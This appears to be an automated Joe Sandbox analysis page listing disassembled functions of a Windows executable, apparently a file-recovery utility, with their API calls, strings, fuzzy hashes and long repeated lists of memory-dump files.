Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CloseExitFileHandleThread$CreateSize
String ID:
API String ID: 1040029889-0
Opcode ID: 856a5ebfec187468768805c26c79d511a891c3ffb3e7a0dee89d7d463da1f341
Instruction ID: b7276341eead1b945f1c1070150407e3af58a0c471b982e1cee2780f028e41db
Opcode Fuzzy Hash: 856a5ebfec187468768805c26c79d511a891c3ffb3e7a0dee89d7d463da1f341
Instruction Fuzzy Hash: 03414C78D00208EFDB04DFE5D989ADEBBB5FF48301F104528E511A7390D774A985CB59

Function 00440510 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 178COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00440641
wsprintfW.USER32 ref: 00440672
wsprintfW.USER32 ref: 004406B6
wsprintfW.USER32 ref: 004406E8

Strings

Another file with the same name "%s" has already been marked to recover. Choose the action to perform., xrefs: 004406DE
The file "%s" is already exists in destination folder. Choose the action to perform., xrefs: 00440637
Another file with the same name "%s" has already been marked to recover. Choose the action to perform., xrefs: 004406AC
The file "%s" is already exists in destination folder. Choose the action to perform., xrefs: 00440668

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: wsprintf
String ID: Another file with the same name "%s" has already been marked to recover. Choose the action to perform.$Another file with the same name "%s" has already been marked to recover. Choose the action to perform.$The file "%s" is already exists in destination folder. Choose the action to perform.$The file "%s" is already exists in destination folder. Choose the action to perform.
API String ID: 2111968516-554295445
Opcode ID: e3f93d0997c4c8463a0d59c5629a6b5c86750845d7a4f48695b4969897ee84db
Instruction ID: c5761580109e2363a2ffbd6f508d20042078887f92f002affa28803dced23957
Opcode Fuzzy Hash: e3f93d0997c4c8463a0d59c5629a6b5c86750845d7a4f48695b4969897ee84db
Instruction Fuzzy Hash: AF912A74200105EFC718CF18DA95E65BBB2FB89314F15C26AE9168F3A5DB70E961CF88

Function 0043C770 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 0043C89F

Part of subcall function 0040EB8A: GetWindowPlacement.USER32(?,?), ref: 0040EB9C

GetDC.USER32(00000000), ref: 0043C79D
GetDeviceCaps.GDI32(?,00000008), ref: 0043C7AC
GetDeviceCaps.GDI32(?,0000000A), ref: 0043C7BB
ReleaseDC.USER32(00000000,?), ref: 0043C7E4
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043C7F1
GetWindowPlacement.USER32(00000000,?), ref: 0043C80C

Strings

Shell_TrayWnd, xrefs: 0043C7EC

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$CapsDevicePlacement$FindInvalidateRectRelease
String ID: Shell_TrayWnd
API String ID: 1093527316-2988720461
Opcode ID: 2fb36102d42e37a455e2445f59e6611a595ecc661ab59924384c51ab6ae803e2
Instruction ID: eeda8f6a72f6e29c54e771e8b0a2dad49d3b4d1448eaca693eb43c6b753d9cbd
Opcode Fuzzy Hash: 2fb36102d42e37a455e2445f59e6611a595ecc661ab59924384c51ab6ae803e2
Instruction Fuzzy Hash: 8B512F70E402189BDB08EFD5CC95BEDBBB5BF48309F14402DE5017B2C6D6BA2991CB59

Function 0044E5A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044E68E
GetLogicalDrives.KERNEL32 ref: 0044E696
GetDriveTypeW.KERNEL32(?), ref: 0044E6F4
GetVolumeInformationW.KERNEL32(?,?,00000100,00000000,00000000,00000000,?,00000200), ref: 0044E742
wsprintfW.USER32 ref: 0044E76A

Part of subcall function 0041383F: EnableWindow.USER32(?,?), ref: 00413850

Strings

, xrefs: 0044E6BA
[%s], xrefs: 0044E75E
A:\, xrefs: 0044E668

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: DriveDrivesEnableInformationLogicalTypeVolumeWindow_memsetwsprintf
String ID: $ [%s]$A:\
API String ID: 3521856438-1502474551
Opcode ID: 238f0c3ef4907da559e1cdb5d37ccb77b90974193ce1b95099ad72de3822e48f
Instruction ID: 5f929be4b25191f67e4e98412fe7a3b9f7c7677a0d3035869c2ee25cb1811fdc
Opcode Fuzzy Hash: 238f0c3ef4907da559e1cdb5d37ccb77b90974193ce1b95099ad72de3822e48f
Instruction Fuzzy Hash: 07517D70B003189BEB24DB59CC51FE9B7B5BF49304F0081EAE10A77681DA785E84CF9A

Function 00446080 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00446171
GetLogicalDrives.KERNEL32 ref: 00446179
GetDriveTypeW.KERNEL32(?), ref: 004461D7
GetVolumeInformationW.KERNEL32(?,?,00000100,00000000,00000000,00000000,?,00000200), ref: 00446225
wsprintfW.USER32 ref: 00446242

Part of subcall function 0041383F: EnableWindow.USER32(?,?), ref: 00413850

Strings

[%s], xrefs: 00446236
, xrefs: 0044619D
A:\, xrefs: 0044614C

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: DriveDrivesEnableInformationLogicalTypeVolumeWindow_memsetwsprintf
String ID: $ [%s]$A:\
API String ID: 3521856438-2854339989
Opcode ID: 974e779e951a24e57327a8f3b0a7b5fdf87e36508d646aab5fde7e2ed6bac833
Instruction ID: 35bdfe39092c7f952d762f28d87d0303ce3b6b30285a429a598c6843f18342a8
Opcode Fuzzy Hash: 974e779e951a24e57327a8f3b0a7b5fdf87e36508d646aab5fde7e2ed6bac833
Instruction Fuzzy Hash: DE514D70A003189BDB64DB54CC55BE9B3B1BF46304F0045EAE54AB6681DAB86AC4CF9A

Function 0043B280 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 0043B2AC
QueryPerformanceCounter.KERNEL32(000000FF), ref: 0043B2D2
wsprintfW.USER32 ref: 0043B2EC
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000000,?), ref: 0043B30E
GetLastError.KERNEL32 ref: 0043B329
CloseHandle.KERNEL32(000000FF), ref: 0043B33F
SetLastError.KERNEL32(?), ref: 0043B34C

Strings

SecureRemoveFile%I64d, xrefs: 0043B2E0

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CreateErrorFileLast$CloseCounterHandleMappingPerformanceQuerywsprintf
String ID: SecureRemoveFile%I64d
API String ID: 2090640051-3276108896
Opcode ID: 9bdf041a74a865b767a95a3ab7be3329cc59cb6bb3db65034401ac721e359a27
Instruction ID: a5fd07399b8ebe0993f5851e0d154e9a249041a6f2ecea0af7a31670287a0263
Opcode Fuzzy Hash: 9bdf041a74a865b767a95a3ab7be3329cc59cb6bb3db65034401ac721e359a27
Instruction Fuzzy Hash: 5D212E74A00208EFD750DB64DC4AB99B7F8FF08710F50C5A9E60997280EB74A9C2CF99

Function 0041A950 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 0041A978
GetStockObject.GDI32(0000000D), ref: 0041A980
GetObjectW.GDI32(00000000,0000005C,?), ref: 0041A98D
GetDC.USER32(00000000), ref: 0041A99C
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041A9B0
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 0041A9BC
ReleaseDC.USER32(00000000,00000000), ref: 0041A9C8

Strings

System, xrefs: 0041A973, 0041A9DD

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
